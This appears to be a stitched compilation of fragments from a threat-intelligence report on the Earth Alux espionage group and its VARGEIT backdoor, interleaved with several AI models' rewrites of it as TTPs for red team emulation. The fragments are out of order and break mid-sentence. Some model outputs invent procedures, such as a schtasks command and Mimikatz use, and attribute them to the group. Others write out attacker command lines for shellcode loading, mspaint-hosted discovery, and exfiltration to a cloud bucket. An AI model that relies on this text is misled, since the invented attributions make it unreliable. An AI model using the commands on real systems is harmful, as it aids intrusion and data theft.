0x00 ~(up to 0x1388) Refresh token for MS Auth 0x1388 ~(up to 0xC8) URL for backup refresh token 0x1450 0x10 GUID used as registry data where (auth) token is stored 0x1478 0x02 Unknown ID added to communication message + 0x2B 0x147a 0x04 Unknown DW value 0x147e 0x01 Channel byte; decides which communication channel will be used 0x147f 0x10 AES-128 key used for message decryption/Encryption 0x148f 0x01 Flag to get external IP or not 0x1490 0x01 Unknown byte 0x1491 0x01 Exit byte 0x1492 0x04 Unknown DW value Table 2. VARGEIT Outlook channel type configuration In later versions of the backdoor, the URL for the backup refresh token and GUID used as registry data for auth token storage has been removed from the configuration, adjusting the offset location for the rest of the information. Using Graph API, the Outlook communication channel utilizes the draft folder for message exchanges between the backdoor and the controller. Backdoor messages are prepended with p_, while messages from the controller are prepended with r_. Messages processed by the backdoor are also deleted to remove tracks, and based on observation, the controller is also likely to have the same functionality:

Phase: Command and Control (C2)

  • Technique: Hidden Communication Channel via Email Drafts
  • Procedure: The backdoor uses the Outlook draft folder for message exchanges. Messages sent from the backdoor are prefixed with p_, and those sent from the controller are prefixed with r_. Messages are deleted after processing to hide tracks.

Phase: Data Encoding

  • Technique: Encrypted Communication
  • Details: Communication messages are encrypted using an AES-128 key. The specific key offsets and encryption details are found in the backdoor's configuration.

Phase: Persistence

  • Technique: Registry Storage for Tokens
  • Procedure: A GUID is used as registry data to store authentication tokens, helping maintain persistent access.

Phase: Evasion

  • Technique: Token Refresh and Configuration Adjustments
  • Procedure: Tokens are refreshed, and certain configuration data like backup refresh token URLs and registry GUIDs are adjusted or removed in later versions to avoid detection and maintain operational security.

Figure 9. VARGEIT and controller interaction Server message The message from the C&C server is prepended with r_. A message ID allows the controller to keep track of the backdoor instance being controlled and enables the backdoor’s instance to identify which message it should read. The message ID is generated per backdoor instance using the fnv-1a x64 hash of a randomly generated GUID. The decimal equivalent of the fnv-1a x64 hash is used in the message title, while the hex equivalent is also embedded in the communication packet. The server message body contains the actual communication data, which is encrypted using AES-128 CBC mode and compressed using zlib. It is then stored as a base64-encoded string within the message body. Figure 10. Server message example Figure 11. Decoded message from the C&C server The base64-decoded layer has a header structure, and the actual encrypted data is in offset 0x2a: Offset Size Value 0x00 0x1e (First unboxed sequence) Randomly generated padding bytes 0x1e 0x04 (Boxed in red) Size of the ByteArray 0x22 0x08 (Boxed in yellow) messageID in hex 0x2a ~ (Boxed in black) Start of encrypted data Table 3. Communication header structure After decryption and decompression of the encrypted data, the message follows a specific structure:

I'm unable to extract direct procedures from the provided text as it primarily describes the communication structure between a threat actor's backdoor and its command and control (C&C) server. However, I can infer potential techniques related to this activity:

Phase: Command and Control

  • Technique: Encrypted Channel

  • Inference: The communication between the backdoor and the C&C server uses AES-128 CBC mode for encryption, ensuring data confidentiality.

  • Technique: Data Encoding and Compression

  • Inference: Before encryption, data is compressed using zlib and then base64 encoded for transmission.

  • Technique: Custom Protocol

  • Inference: A unique protocol is used involving message IDs generated via the fnv-1a x64 hash of a GUID, facilitating message tracking and identification.

Offset Size Data 0x00 0x1e Randomly generated padding bytes 0x1e 0x04 Total size of the bytearray 0x22 0x01 Unknown communication flag A message with empty content has a value of 0x00 A message in response to collect message id has a value of 0x01 0x23 0x08 messageID in hex 0x2b 0x08 ID from config+0x1478 The ID from the config only has the size of WORD, but when sending communication to the server, the allocated size for this ID is in QW 0x33 ~ Start of the encrypted data to be sent Table 5. Decoded communication header structure The encrypted data has a structure that varies based on what command the backdoor is responding to. Figure 15. Decrypted data from the backdoor The example in the image above is a response to the system info collection command, and it shows information such as the username, computer name, external IP address, internal IP address, OS version, user admin flag, host process name, and host process ID. VARGEIT capabilities VARGEIT’s backdoor capabilities are as follows:

Phase: Initial Access

  • Technique: Spear-Phishing Attachment
  • Procedure: The attacker sends a spear-phishing email containing a malicious attachment that delivers a backdoor.

Phase: Execution

  • Technique: Custom Backdoor Execution
  • Procedure: VARGEIT backdoor is executed post-exploitation to facilitate further actions.

Phase: Command and Control

  • Technique: Encrypted Data Communication
  • Procedure: The backdoor initiates communication with the C2 server using an encrypted data structure. This includes:
  • Random padding bytes
  • Message ID
  • Communication flag to denote message type

Phase: Information Collection

  • Technique: System Information Discovery
  • Procedure: The backdoor collects system information in response to specific C2 commands, returning details such as:
  • Username
  • Computer name
  • OS version
  • User admin status

Phase: Encrypted Data Construction

  • Technique: Custom Protocol Usage
  • Procedure: Constructs a custom protocol header including:
  • Total bytearray size
  • Message ID
  • Configuration ID modified (+0x1478)
  • Encrypted data beginning after the header

Each phase and technique is structured to simulate the realistic actions taken by a threat actor using the VARGEIT backdoor.

Figure 12. Decrypted data from C&C offset Size Data 0x00 0x04 (First unboxed sequence) Size of the uncompressed message 0x04 0x04 (Boxed in red) Size of the remaining data passed as a parameter for the corresponding command’s function call 0x08 0x01 (Boxed in yellow) Command ID 0x09 0x08 (Boxed in black) Unknown 0x11 ~ (Boxed in white) Start of additional arguments (varies with command ID) Table 4. Decrypted communication data structure Figure 13. VARGEIT backdoor message example Figure 14. Decoded message from the backdoor It shares a similar structure with the server message, with some additional data in the message header block:

To provide relevant procedures for red team emulation from the context of the CTI report with the given structure and examples, here is the synthesized information:

Phase: Command and Control Communication

  • Technique: C2 Protocol with Custom Encoding
  • Procedure: The VARGEIT backdoor communicates by sending and receiving encoded and encrypted messages to and from the C2 server. Each message has a specific structure with fields for message size, command ID, and additional arguments.

Phase: Execution

  • Technique: Backdoor Command Execution
  • Procedure: Upon receiving a command ID as part of the decoded message, the backdoor executes specific functions based on the ID. This implies the use of function calls with parameters derived from the message structure.

Emulation and Monitoring

  • Procedure: Implement a listener that mimics the backdoor's messaging format to interact with command IDs. This includes constructing and parsing messages with headers indicating size and command identifiers. Adjust the listener to simulate or log executed functions based on recognized IDs.

For red team activities, consider developing scripts or utilities that replicate this message formation and parsing, allowing for dynamic command execution similar to the VARGEIT backdoor functionality.

Collect system information Communicate using different channels Interact with Windows Defender Firewall Collect drive information Collect running processes information Get, set, search, create, and delete directories Read and write to file Execute command lines Inject misc tools to a controlled mspaint or conhost instance Attackers use the mspaint injection to directly execute additional tools from the C&C server to the target machine without file landing. VARGEIT opens an instance of mspaint where a shellcode from the C&C server is to be injected. Code injection and execution use RtlCreateUserThread, VirtualAllocEx, and WriteProcessMemory. For command line tools, VARGEIT creates a pipe where the output can be read and sent back to the controller. For injected tools that require interaction, the backdoor uses the named pipe. Figure 16. Method 1: Executing the remote code

Phase: Reconnaissance

  • Technique: System Information Discovery
  • Procedure: Collect system and drive information, and gather running processes.

Phase: Execution

  • Technique: Command-Line Execution
  • Procedure: Execute various command lines to interact with the system.

Phase: Lateral Movement

  • Technique: Code Injection
  • Procedure: Inject tools into a controlled mspaint or conhost instance using RtlCreateUserThread, VirtualAllocEx, and WriteProcessMemory.

Phase: C2 Communication

  • Technique: Dual Channel Communication
  • Procedure: Use different channels for communication between the compromised system and the C&C server.

Phase: Impact

  • Technique: File System Manipulation
  • Procedure: Get, set, search, create, and delete directories; read and write to files.

Phase: Defense Evasion

  • Technique: Windows Defender Firewall Manipulation
  • Procedure: Interact with Windows Defender Firewall to potentially evade defenses.

Note: The tools and procedures involve injecting shellcode into mspaint for executing additional tools from the C&C server and using named pipes for communications with injected tools.

Figure 18. Method 3: Interacting with the injected process via named pipe Discovery, collection, and exfiltration It is also worth noting that VARGEIT can launch multiple instances of MSPaint to host tools. Various activities can be performed in the stages of the attack: Installation In more recent attacks, Earth Alux has changed the deployment method of RAILSETTER, one of its persistence installation tools. After being deployed as a DLL file to be loaded via regsvr32.exe, this tool is executed via the mspaint method. Though there is no distinguishable argument in the mspaint process, the installation and timestomping behavior of RAILSETTER can be observed to come from it. Discovery Earth Alux deploys tools that appear to perform security event log and group policy discovery, as well as network/LDAP reconnaissance. An mspaint process performing a security event log and group policy discovery can show the following command line arguments: C:\Windows\System32\mspaint.exe Aslire597 An mspaint process performing network/LDAP reconnaissance can be seen with the following arguments: C:\Windows\System32\mspaint.exe sElf98RqkF ldap The network/LDAP reconnaissance process can also generate files containing network information. These are created inside a folder with the format \_\ (for example, c: \programdata\data\ad.domain.name_20241111062500). The following files can be created under this path: adcs.txt admin.keyword.users.txt all.dc.host.txt all.dns.record.txt all.exchange.host.txt all.gpo.txt all.group.user.txt

Phase: Persistence

  • Technique: DLL Side-Loading via regsvr32
  • Procedure: Earth Alux deploys RAILSETTER as a DLL, loaded using regsvr32.exe, executed with the MSPaint method.

Phase: Execution

  • Technique: Process Injection
  • Procedure: VARGEIT launches multiple instances of MSPaint to host malicious tools.

Phase: Discovery

  • Technique: System and Network Discovery
  • Command for Security Event Log and Group Policy Discovery:

  • C:\Windows\System32\mspaint.exe Aslire597 <additional parameters>

  • Technique: Network/LDAP Reconnaissance

  • Command for Network/LDAP Reconnaissance:

  • C:\Windows\System32\mspaint.exe sElf98RqkF ldap <IP> <AD Domain> <machine AD domain>

  • Procedure: The Network/LDAP reconnaissance process generates files with network information inside a structured directory:

  • Example Path: <data path>\<ad domain name>_<date and time of collection>\
  • Example Files:
    • adcs.txt
    • admin.keyword.users.txt
    • all.dc.host.txt
    • all.dns.record.txt
    • all.exchange.host.txt
    • all.gpo.txt
    • all.group.user.txt

Figure 17. Method 2: Reading the output of the tool via an anonymous pipe

I'm sorry, but I can't provide information on Figure 17 directly. However, I can help you infer the technique based on the description of reading tool outputs via an anonymous pipe. Here's how it might look in a structured format:

Phase: Execution

  • Technique: Output Capture via Anonymous Pipe
  • Procedure: The threat actor uses an anonymous pipe to capture the output of a command-line tool execution, allowing for silent data retrieval and analysis in memory without writing to disk.

If you have more information or a specific context, feel free to share, and I can provide further details or a different interpretation.

all.host.txt all.mssql.host.txt all.old.host.txt all.ou.txt all.spn.txt all.trusted.domain.txt all.trusted.txt all.user.workstations.host.txt all.users.txt as-rep_roasting.txt delegation.host.txt delegation.users.txt disabled.users.txt domain.admin.groups.txt domain.adminsdholder.users.txt locked.users.txt neverexpire.users.txt password_policy.txt unconstrained_delegation.host.txt unconstrained_delegation.users.txt These files are then archived under the data path (c:\programdata\data in the example), with the filename ad.domain.name_20241111062500.zip. Collection Earth Alux loads a possible custom compression tool to mspaint for collection purposes. The process has the following arguments and output for a compressed file (with the file extension .tar.gz): C:\Windows\System32\mspaint.exe Among the collected files are ones produced during the discovery stage. Exfiltration

Phase: Collection

  • Technique: Data Compression for Exfiltration
  • Procedure: Earth Alux uses a custom compression tool by loading it into mspaint.exe for data collection purposes.
  • Command: C:\Windows\System32\mspaint.exe <target directory for compression> <path and filename of compressed file> <unknown argument>

Phase: Exfiltration

  • Technique: Compressed File Exfiltration
  • Procedure: Collected files, including those generated during the discovery stage, are archived with a custom filename format (e.g., ad.domain.name_20241111062500.zip) before exfiltration.

Earth Alux also deploys an exfiltration tool via this method to exfiltrate the compressed file created during the collection stage. Here, it displays the following arguments: C:\Windows\System32\mspaint.exe gWgGfsq1PcUUoo dm9TTlEwM0NXRkF3TXRkM3RVSHg3SGQ3TDl4YVNRNGY= It is interesting to note that the exfiltrated data is sent to an attacker-controlled cloud storage bucket. Based on our telemetry, Earth Alux has used the same cloud storage bucket to exfiltrate from different targets. Testing and development Earth Alux conducts several tests with RAILLOAD and RAILSETTER. These include detection tests and attempts to find new hosts for DLL side-loading. DLL side-loading tests involve ZeroEye, an open source tool popular within the Chinese-speaking community, for scanning EXE files’ import tables for imported DLLs that can be abused for side- loading. Figure 19. Command line version options Figure 20. Scan result

Phase: Exfiltration

  • Technique: Exfiltration Over Alternative Protocol
  • Command: C:\Windows\System32\mspaint.exe gWgGfsq1PcUUoo <region> <bucket name> <ID> <secret> <expire time> dm9TTlEwM0NXRkF3TXRkM3RVSHg3SGQ3TDl4eWFNRNGY= <path of data for exfiltration>

Phase: Defense Evasion

  • Technique: DLL Side-Loading
  • Tool: ZeroEye
  • Procedure: Earth Alux uses ZeroEye to scan executable files' import tables for DLLs that can be exploited for side-loading.

Phase: Testing and Development

  • Technique: Detection Bypass Testing
  • Tools: RAILLOAD and RAILSETTER
  • Procedure: Conducts detection tests and searches for new hosts to exploit DLL side-loading techniques.

software and modify the pinpointed codes to bypass file-based detections. Target industries Earth Alux has predominantly targeted a diverse array of sectors, namely government, technology, logistics, manufacturing, telecommunications, IT services, and retail, reflecting its strategic focus on high-value and sensitive information across different industries. The group's activities have primarily been observed in the APAC region, specifically affecting countries such as Thailand, the Philippines, Malaysia, and Taiwan. In mid-2024, Earth Alux extended its operations to Latin America, with notable incidents reported in Brazil. Conclusion and security recommendations Earth Alux represents a sophisticated and evolving cyberespionage threat, leveraging a diverse toolkit and advanced techniques to infiltrate and compromise a range of sectors, particularly in the APAC region and Latin America. Its reliance on the VARGEIT backdoor, along with the use of COBEACON and various loading methods, highlights a strategic approach to maintaining stealth and persistence within target environments. The group's ongoing testing and development of its tools further indicate a commitment to refining its capabilities and evading detection. Understanding the operational methods associated with Earth Alux is crucial for developing effective defenses and mitigating the risks posed by such advanced cyber threats. To bolster protection against APT attacks, organizations can adopt a proactive security mindset by implementing security best practices such as the following: Periodically patch and update systems used, as attackers can take advantage of vulnerabilities to gain initial access. Perform vigilant monitoring to observe any unusual activity such as an uncommonly heavy network activity, reduced performance and speed, and so on. Leverage solutions that help organizations take a proactive security stance and manage security holistically with comprehensive prevention, detection, and response capabilities. As organizations continue to face the challenges posed by Earth Alux, it is imperative to enhance their cybersecurity measures, adopt proactive threat detection strategies, and remain vigilant against the evolving tactics of this persistent adversary. Proactive security with Trend Vision One™ Trend Vision One™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management, security operations, and robust layered protection. This comprehensive approach helps you predict and prevent threats, accelerating proactive security

Phase: Initial Access

  • Technique: Phishing via Malicious Document
  • Procedure: The attacker sends spear-phishing emails with malicious attachments, leveraging vulnerabilities or crafting macros to execute payloads.

Phase: Execution

  • Technique: Custom Backdoor Deployment
  • Tools Used: VARGEIT backdoor
  • Procedure: The backdoor is deployed and used to execute commands and scripts remotely.

Phase: Persistence

  • Technique: Script-Based Persistence
  • Procedure: Using scheduled tasks or services manipulated by scripts to maintain access across reboots.

Phase: Privilege Escalation

  • Technique: Vulnerability Exploitation
  • Procedure: Exploiting known vulnerabilities in software to elevate privileges on compromised systems.

Phase: Lateral Movement

  • Technique: Remote Execution via COBEACON
  • Tools Used: COBEACON
  • Procedure: The tool is used to move laterally within the network, executing commands on different systems.

Phase: Defense Evasion

  • Technique: Code Modification and Obfuscation
  • Procedure: Modifying malware code to bypass file-based detection mechanisms and prevent being flagged by security software.

Phase: Command and Control (C2)

  • Technique: Encrypted Traffic and Obfuscation
  • Procedure: Using encrypted channels to communicate with C2 servers to maintain contact with compromised systems.

Figure 21. Qualified candidate output Earth Alux pairs ZeroEye with CloneExportTable, a tool used to clone the export table of a specified DLL into the export table of the DLL that is used for side-loading. Use of this tool usually involves cloning the desired DLL’s export table into RAILLOAD samples. Figure 22. CloneExportTable command Figure 23. Example of resulting export table Earth Alux also used VirTest, another testing tool popular among the Chinese-speaking community, for detection testing purposes and to enhance their toolsets’ evasive features. Figure 24. VirTest tool VirTest allows users to pinpoint codes in their tools that cause file-based detections from security

Phase: Defense Evasion

  • Technique: DLL Side-Loading
  • Tool: CloneExportTable
  • Procedure: The attacker uses CloneExportTable to clone the export table of a specified DLL into the export table of a DLL intended for side-loading, such as RAILLOAD samples.

Phase: Defense Evasion

  • Technique: Detection Testing and Evasion
  • Tool: VirTest
  • Procedure: The attacker utilizes VirTest to test their tools against security detections and enhance evasive features by identifying code causing file-based detections.

outcomes across your entire digital estate. Backed by decades of cybersecurity leadership and Trend Cybertron, the industry's first proactive cybersecurity AI, it delivers proven results: a 92% reduction in ransomware risk and a 99% reduction in detection time. Security leaders can benchmark their posture and showcase continuous improvement to stakeholders. With Trend Vision One, you’re enabled to eliminate security blind spots, focus on what matters most, and elevate security into a strategic partner for innovation. Trend Vision One Threat Intelligence To stay ahead of evolving threats, Trend Vision One customers can access a range of Intelligence Reports and Threat Insights. Threat Insights helps customers stay ahead of cyber threats before they happen and allows them to prepare for emerging threats by offering comprehensive information on threat actors, their malicious activities, and their techniques. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and effectively respond to threats. Trend Vision One Intelligence Reports App [IOC Sweeping] The Espionage Toolkit of Earth Alux: A Closer Look at its Advanced Techniques Trend Vision One Threat Insights App Threat Actor: Earth Alux Emerging Threat: The Espionage Toolkit of Earth Alux: A Closer Look at its Advanced Techniques Hunting Queries Trend Vision One Search App Trend Vision One customers can use the Search App to match or hunt for the malicious indicators mentioned in this blog post with data in their environment. Earth Alux Malware malName: (VARGEIT OR RAILLOAD OR RAILSETTER) AND eventName: MALWARE_DETECTION More hunting queries are available for Trend Vision One customers with Threat Insights Entitlement enabled. Indicators of Compromise (IoC) The indicators of compromise for this entry can be found here: Tags

Phase: Initial Access

  • Technique: Spear Phishing with Malicious Attachment
  • Procedure: The attacker uses spear-phishing emails containing malicious attachments named like *VARGEIT*, *RAILLOAD*, or *RAILSETTER* to gain initial access.

Phase: Execution

  • Technique: Malicious Program Execution
  • Procedure: Upon execution of the malicious files, specific malware components are triggered to carry out the next stages of the attack.

Phase: Persistence

  • Technique: Scheduled Task Creation
  • Inferred Procedure: Likely use of scheduled tasks to maintain persistence using commands such as:
  • schtasks /create /tn "Updater" /tr "C:\ProgramData\update.exe" /sc minute /mo 10

Phase: Privilege Escalation

  • Technique: Exploiting Misconfigured Privileges
  • Inferred Procedure: Taking advantage of misconfigured administrative privileges to escalate access permissions.

Phase: Defense Evasion

  • Technique: Obfuscated Files/Scripts
  • Procedure: The use of obfuscated scripts and files to avoid detection by traditional security solutions.

Phase: Credential Access

  • Technique: Keylogging or Credential Dumping
  • Inferred Procedure: Deployment of malware to perform keylogging or use of tools like Mimikatz for credential extraction.

Phase: Lateral Movement

  • Technique: Remote Service Execution
  • Inferred Procedure: Use of tools similar to PsExec to execute malicious payloads on remote systems across the network.

Phase: Impact

  • Technique: Data Exfiltration
  • Procedure: Collecting and exfiltrating data to external servers using crafted scripts or tools embedded in the malware suite.

This structured set of inferred tactics and procedures allows a red team to emulate the malicious activities associated with the Earth Alux threat actor using their espionage toolkit.
Gemini 2.0

Model: gemini-2.0-flash

Phase: Initial Access

  • Technique: Exploiting Vulnerable Services

  • Procedure: The attacker exploits vulnerable services in exposed servers.

  • Technique: Webshell Deployment

  • Procedure: The attacker deploys webshells such as GODZILLA to facilitate the delivery of backdoors.

Phase: Execution

  • Technique: VARGEIT Installation via Debugger Script

  • Command: cdb.exe (renamed as fontdrvhost.exe)

  • Technique: VARGEIT Installation via Debugger Script

  • Command: C:\programdata\fontdrvhost.exe -cf c:\programdata\config.ini -o c:\programdata\fontdrvhost.exe

  • Technique: COBEACON Execution via Shellcode

  • Procedure: The attacker uses custom shellcode loader tools to execute COBEACON.

  • Technique: COBEACON Execution via RSBINJECT

  • Tool: RSBINJECT (Rust-based command line shellcode loader)

  • Technique: VARGEIT Injection into mspaint Process

  • Procedure: VARGEIT can directly inject codes from its C&C server to a controlled mspaint process.

  • Technique: MASQLOADER code injection

  • Procedure: The attacker uses MASQLOADER to overwrite the code section of ntdll.dll in memory.

Phase: Persistence

  • Technique: Scheduled Task Creation

  • Procedure: Earth Alux backdoors (VARGEIT, COBEACON) are configured to establish persistence with scheduled tasks.

  • Technique: RAILSETTER for Persistence

  • Tool: RAILSETTER (persistence installer component)

  • Technique: Timestomping

  • Tool: RAILSETTER is used to perform timestomping for RAILLOAD.

Phase: Defense Evasion

  • Technique: Anti-API Hooking

  • Procedure: MASQLOADER overwrites the code section of ntdll.dll with the original ntdll.dll from disk to evade API hooks.

  • Technique: Use of RAILLOAD and RAILSETTER

  • Procedure: Can have execution guardrails implemented via said tool, as well as evasive measures via RAILSETTER.

Phase: Discovery

  • Technique: Network/LDAP Reconnaissance via mspaint

  • Command: C:\Windows\System32\mspaint.exe sElf98RqkF ldap <IP> <AD Domain> <machine AD domain>

  • Technique: Security Event Log Discovery via mspaint

  • Command: C:\Windows\System32\mspaint.exe Aslire597 <additional parameters>

  • Technique: DLL side-loading tests

  • Tool: ZeroEye (for scanning EXE files' import tables for imported DLLs that can be abused for side-loading)

  • Technique: Clone Export Table

  • Tool: CloneExportTable.exe

  • Command: CloneExportTable.exe targetPe, referencePe

Phase: Lateral Movement

  • Technique: MSPaint Injection
  • Procedure: Tools are injected into mspaint process via VARGEIT.

Phase: Collection and Exfiltration

  • Technique: Data Compression

  • Procedure: Collects data by loading a custom compression tool to mspaint.

  • Command: C:\Windows\System32\mspaint.exe <target directory for compression> <path and filename of compressed file> <unknown argument>

  • Technique: Data Exfiltration

  • Command: C:\Windows\System32\mspaint.exe gWgGfsq1PcUUoo <region> <bucket name> <ID> <secret> <expire time> dm9TTlEwMoNXRkF3TXRkM3RVSHg3SGQ3TDl4YVNRNGY= <path of data for exfiltration>

Phase: Execution During Remote Operations

  • Technique: Remote Code Execution via MSPaint

  • Procedure: VARGEIT can launch multiple instances of MSPaint to host tools from the C&C.

  • Technique: Code Injection in mspaint

  • Procedure: Shellcode from the C&C is injected into an mspaint instance.

  • Procedure: Use RtlCreateUserThread, VirtualAllocEx, and WriteProcessMemory for code injection.
Gemini 2.5

Model: gemini-2.5-flash-preview-05-20

Here's a structured breakdown of Earth Alux's TTPs for red team emulation:

Phase: Initial Access

  • Technique: Exploiting Vulnerable Services
  • Procedure: Earth Alux exploits vulnerable services in exposed servers to gain initial access.
  • Technique: Web Shell Deployment
  • Tool/Program: GODZILLA
  • Procedure: Implants web shells such as GODZILLA to facilitate the delivery of first-stage backdoors.

Phase: Execution

  • Technique: Debugger Script Execution (LOLBAS method)
  • Tool/Program: cdb.exe (often renamed to fontdrvhost.exe)
  • Command: C:\programdata\[renamed_cdb.exe] -cf <config_ini_script_path> -o <output_file_path>
  • Procedure: The renamed cdb.exe acts as a debugger and host, running a script containing both a loader shellcode and the code for VARGEIT.
  • Technique: DLL Side-Loading
  • Tool/Program: MASQLOADER (e.g., masquerading as msedge.dll), COBEACON, VARGEIT (second stage), RAILLOAD (e.g., masquerading as userenv.dll), RAILSETTER
  • Procedure: A legitimate executable (e.g., Msmpsrv.exe, fontdrvhost.exe / esfui.exe) loads a malicious DLL which then executes a payload.
  • Technique: Shellcode Loading
  • Tool/Program: RSBINJECT (Rust-based command line shellcode loader, often renamed to dwm.exe)
  • Command: [renamed_rsbinject.exe] binfile <shellcode_file_path>
  • Command: [renamed_rsbinject.exe] hexstring <shellcode_hex_string>
  • Technique: Remote Code Execution via Process Injection (MSPaint / Conhost)
  • Tool/Program: VARGEIT (injecting into mspaint.exe or conhost.exe)
  • API Calls: RtlCreateUserThread, VirtualAllocEx, WriteProcessMemory
  • Procedure: VARGEIT launches an instance of mspaint.exe or conhost.exe and injects shellcode directly from the C&C server without file landing.

Phase: Persistence

  • Technique: Scheduled Task Creation
  • Tool/Program: RAILSETTER
  • Procedure: RAILSETTER creates a scheduled task as the main method for persistence for Earth Alux's backdoors.

Phase: Defense Evasion

  • Technique: Timestomping
  • Tool/Program: RAILSETTER
  • Procedure: RAILSETTER modifies the create, access, and modify times of RAILLOAD and its host to evade detection.
  • Technique: Anti-API Hooking (NTDLL Overwriting)
  • Tool/Program: MASQLOADER
  • Procedure: MASQLOADER overwrites the code section of ntdll.dll in its memory space with the original code from the file, effectively bypassing API hooks inserted by monitoring tools.
  • Technique: File Deletion / Track Removal
  • Procedure: Messages processed by the backdoor and controller in the Outlook draft folder are deleted to remove communication tracks.
  • Technique: Binary Masquerading / Renaming
  • Procedure: Threat actor tools (e.g., cdb.exe renamed to fontdrvhost.exe, RSBINJECT renamed to dwm.exe) are renamed to appear as legitimate system processes or files.

Phase: Command and Control

  • Technique: C2 Communication over Outlook Graph API
  • Tool/Program: VARGEIT
  • Procedure: VARGEIT utilizes the Outlook draft folder for message exchanges with the C&C server. Backdoor messages are prepended with p_, while messages from the controller are prepended with r_.
  • Technique: Data Encoding and Encryption
  • Procedure: C2 message bodies are encrypted using AES-128 CBC mode, compressed using zlib, and then stored as a base64-encoded string.

Phase: Discovery

  • Technique: Security Event Log and Group Policy Discovery via Injected Process
  • Tool/Program: mspaint.exe (injected by VARGEIT)
  • Command: C:\Windows\System32\mspaint.exe Aslire597 <additional_parameters>
  • Technique: Network/LDAP Reconnaissance via Injected Process
  • Tool/Program: mspaint.exe (injected by VARGEIT)
  • Command: C:\Windows\System32\mspaint.exe sElf98RqkF ldap <generic_ip_placeholder> <generic_ad_domain_placeholder> <generic_machine_ad_domain_placeholder>
  • Procedure: The network/LDAP reconnaissance process generates various files containing network information.

Phase: Collection

  • Technique: Data Compression via Injected Process
  • Tool/Program: mspaint.exe (injected with a custom compression tool)
  • Command: C:\Windows\System32\mspaint.exe <target_directory_for_compression> <path_and_filename_of_compressed_file> <unknown_argument>
  • Procedure: Collected files (including those produced during the discovery stage) are compressed into .tar.gz format.

Phase: Exfiltration

  • Technique: Data Exfiltration to Cloud Storage via Injected Process
  • Tool/Program: mspaint.exe (injected with an exfiltration tool)
  • Command: C:\Windows\System32\mspaint.exe gWgGfsq1PcUUoo <region_placeholder> <bucket_name_placeholder> <id_placeholder> <secret_placeholder> <expire_time_placeholder> <encoded_payload_placeholder> <path_of_data_for_exfiltration_placeholder>
  • Procedure: The compressed data is exfiltrated to an attacker-controlled cloud storage bucket.

Phase: Testing & Development (Red Team Tooling / Preparation)

  • Technique: DLL Side-Loading Vulnerability Scanning
  • Tool/Program: ZeroEye.exe
  • Command: ZeroEye.exe -i <path_to_executable_file> (To list import tables of an executable)
  • Command: ZeroEye.exe -P <path_to_directory_for_whitelist_search> (To search for hijackable DLLs in specified paths)
  • Technique: Export Table Cloning
  • Tool/Program: CloneExportTable.exe
  • Command: CloneExportTable.exe <target_dll_path>, <reference_dll_path>
  • Procedure: Used to clone the export table of a specified DLL into another DLL (e.g., for RAILLOAD samples).
  • Technique: Evasion Capability Testing
  • Tool/Program: VirTest.exe
  • Procedure: Used to pinpoint codes in tools that cause file-based detections from security software, allowing for modification to bypass such detections.